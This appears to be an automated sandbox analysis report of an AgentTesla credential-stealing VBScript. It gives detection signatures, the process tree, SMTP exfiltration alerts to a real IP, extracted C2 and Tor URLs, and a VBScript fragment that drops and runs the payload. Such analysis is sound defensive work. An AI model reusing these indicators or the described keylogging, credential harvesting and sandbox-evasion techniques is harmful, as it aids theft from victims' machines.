
Windows Analysis Report TGFTR.vbs

Overview

General Information

Sample Name: TGFTR.vbs
Analysis ID: 546894
MD5: 49d19f0ce5da944d1423d3f189b22103
SHA1: 305fbc7a46a028c4354f13a417ba46f67464ebab
SHA256: ac0517947c0be7baad44fb8f054215c00ada03bb61772bab9eb52e48a9c3a097
Tags: AgentTesla, vbs

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected AgentTesla
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3672 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\TGFTR.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • anyname.exe (PID: 6000 cmdline: "C:\Users\user\AppData\Local\Temp\anyname.exe" MD5: 9AC2AB7CA14ACC134AEFDF731DED674B)
      • anyname.exe (PID: 6260 cmdline: C:\Users\user\AppData\Local\Temp\anyname.exe MD5: 9AC2AB7CA14ACC134AEFDF731DED674B)
      • anyname.exe (PID: 5940 cmdline: C:\Users\user\AppData\Local\Temp\anyname.exe MD5: 9AC2AB7CA14ACC134AEFDF731DED674B)
      • anyname.exe (PID: 6116 cmdline: C:\Users\user\AppData\Local\Temp\anyname.exe MD5: 9AC2AB7CA14ACC134AEFDF731DED674B)
      • anyname.exe (PID: 5608 cmdline: C:\Users\user\AppData\Local\Temp\anyname.exe MD5: 9AC2AB7CA14ACC134AEFDF731DED674B)
  • jNnIJrO.exe (PID: 5952 cmdline: "C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe" MD5: 9AC2AB7CA14ACC134AEFDF731DED674B)
    • jNnIJrO.exe (PID: 2276 cmdline: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe MD5: 9AC2AB7CA14ACC134AEFDF731DED674B)
  • jNnIJrO.exe (PID: 5280 cmdline: "C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe" MD5: 9AC2AB7CA14ACC134AEFDF731DED674B)
    • jNnIJrO.exe (PID: 6456 cmdline: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe MD5: 9AC2AB7CA14ACC134AEFDF731DED674B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000001.00000002.339301678.0000000003449000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000001.00000002.339301678.0000000003449000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0000000E.00000000.414176975.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000E.00000000.414176975.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0000000E.00000002.437781088.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(5 of 52 entries shown)

Unpacked PEs

Source | Rule | Description | Author
14.0.jNnIJrO.exe.400000.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
14.0.jNnIJrO.exe.400000.4.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
6.0.anyname.exe.400000.10.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
6.0.anyname.exe.400000.10.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
18.0.jNnIJrO.exe.400000.10.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(5 of 61 entries shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: TGFTR.vbs | ReversingLabs: Detection: 39%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\tmpG259.tmp (copy) | ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | ReversingLabs: Detection: 32%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Joe Sandbox ML: detected
Source: 6.0.anyname.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: 18.0.jNnIJrO.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: 14.0.jNnIJrO.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 14.2.jNnIJrO.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 14.0.jNnIJrO.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: 6.2.anyname.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 6.0.anyname.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 14.0.jNnIJrO.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: 18.0.jNnIJrO.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: 18.0.jNnIJrO.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 18.0.jNnIJrO.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: 18.2.jNnIJrO.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 6.0.anyname.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: 18.0.jNnIJrO.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: 14.0.jNnIJrO.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: 14.0.jNnIJrO.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: 6.0.anyname.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: 6.0.anyname.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Code function: 4x nop then jmp 06F99093h | 10_2_06F98328

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49799 -> 162.241.148.206:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49800 -> 162.241.148.206:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49803 -> 162.241.148.206:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49804 -> 162.241.148.206:587
Potential malicious VBS script found (has network functionality)
Source: Initial file | sea.SavetoFile maasr & "\anyname.exe",2
Source: global traffic | TCP traffic: 192.168.2.3:49799 -> 162.241.148.206:587
                      Source: anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/
                      Source: anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303924115.0000000005392000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/fi-fj
                      Source: anyname.exe, 00000001.00000003.305479835.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304813720.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305305998.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304778818.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304935196.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305193401.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304864654.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305379502.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304993341.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305244460.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305125471.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305058733.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/j
                      Source: anyname.exe, 00000001.00000003.303718023.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304813720.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304778818.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304864654.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303741179.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303924115.0000000005392000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                      Source: anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304813720.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304778818.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304935196.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305193401.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304864654.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304993341.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305244460.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305125471.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305058733.0000000005393000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/N
                      Source: anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/u
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.301360086.0000000005392000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304620293.0000000005383000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netD
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
                      Source: anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
                      Source: anyname.exe, 00000006.00000002.823366416.0000000002DD1000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%
                      Source: jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.825746785.000000000343E000.00000004.00000001.sdmp | String found in binary or memory: https://pZXqS7KWMFA4rh4s.net
                      Source: jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp | String found in binary or memory: https://pZXqS7KWMFA4rh4s.net$
                      Source: anyname.exe, 00000001.00000002.339301678.0000000003449000.00000004.00000001.sdmp, anyname.exe, 00000006.00000002.818827980.0000000000402000.00000040.00000001.sdmp, anyname.exe, 00000006.00000000.333358376.0000000000402000.00000040.00000001.sdmp, jNnIJrO.exe, 0000000A.00000002.421939439.0000000003C69000.00000004.00000001.sdmp, jNnIJrO.exe, 0000000E.00000002.437781088.0000000000402000.00000040.00000001.sdmp, jNnIJrO.exe, 0000000E.00000000.412466130.0000000000402000.00000040.00000001.sdmp, jNnIJrO.exe, 00000010.00000002.437858484.0000000003819000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000000.432184199.0000000000402000.00000040.00000001.sdmp, jNnIJrO.exe, 00000012.00000000.429637125.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: anyname.exe, 00000006.00000002.823366416.0000000002DD1000.00000004.00000001.sdmp, jNnIJrO.exe, 0000000E.00000002.439216232.0000000002FE1000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknown | DNS traffic detected: queries for: mail.gnvmetalica.pe

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Installs a global keyboard hook
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\anyname.exe
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Window created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Window created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      .NET source code contains very large array initializations
                      Source: 6.0.anyname.exe.400000.10.unpack, <PrivateImplementationDetails>{F4C6BC43-451D-4C27-A83A-8385F6B71886}/3EB7A67C-4401-43FC-899B-D2C8FBEB686A.cs | Large array initialization: .cctor: array initializer size 11957
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Code function: 6_2_014D46A0 | 6_2_014D46A0
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Code function: 6_2_014D3D50 | 6_2_014D3D50
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Code function: 6_2_014D4630 | 6_2_014D4630
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Code function: 6_2_014D4690 | 6_2_014D4690
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Code function: 6_2_014DDA01 | 6_2_014DDA01
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Code function: 6_2_0530E238 | 6_2_0530E238
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Code function: 6_2_0530ACF8 | 6_2_0530ACF8
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Code function: 6_2_06146C70 | 6_2_06146C70
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Code function: 6_2_061494F8 | 6_2_061494F8
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Code function: 6_2_06147540 | 6_2_06147540
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Code function: 6_2_06146928 | 6_2_06146928
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Code function: 6_2_067B16E8 | 6_2_067B16E8
                      Source: TGFTR.vbs | Initial sample: Strings found which are bigger than 50
                      Source: anyname.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: jNnIJrO.exe.6.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: TGFTR.vbs | ReversingLabs: Detection: 39%
                      Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\TGFTR.vbs"
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\anyname.exe "C:\Users\user\AppData\Local\Temp\anyname.exe"
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Process created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exe
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Process created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exe
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Process created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exe
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Process created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exe
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe "C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe"
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Process created: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                      Source: unknown | Process created: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe "C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe"
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Process created: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\anyname.exe "C:\Users\user\AppData\Local\Temp\anyname.exe"
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Process created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exe
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Process created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exe
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Process created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exe
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Process created: C:\Users\user\AppData\Local\Temp\anyname.exe C:\Users\user\AppData\Local\Temp\anyname.exe
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Process created: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Process created: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                      Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\anyname.exe.log
                      Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\anyname.exe
                      Source: classification engine | Classification label: mal100.troj.spyw.evad.winVBS@17/7@4/1
                      Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\TGFTR.vbs"
                      Source: 6.0.anyname.exe.400000.10.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 6.0.anyname.exe.400000.10.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                      Data Obfuscation:

                      VBScript performs obfuscated calls to suspicious functions
                      Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: \AppData\Local\Temp\anyname.exe", "2");IWshShell3.Run("C:\Users\user\AppData\Local\Temp\anyname.exe")
                      .NET source code contains potential unpacker
                      Source: anyname.exe.0.dr, Windows/MainForm.cs | .Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.0.anyname.exe.10000.0.unpack, Windows/MainForm.cs | .Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 1.2.anyname.exe.10000.0.unpack, Windows/MainForm.cs | .Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.0.anyname.exe.1a0000.2.unpack, Windows/MainForm.cs | .Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.0.anyname.exe.1a0000.1.unpack, Windows/MainForm.cs | .Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 3.0.anyname.exe.1a0000.3.unpack, Windows/MainForm.cs | .Net Code: POERCX_31424 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
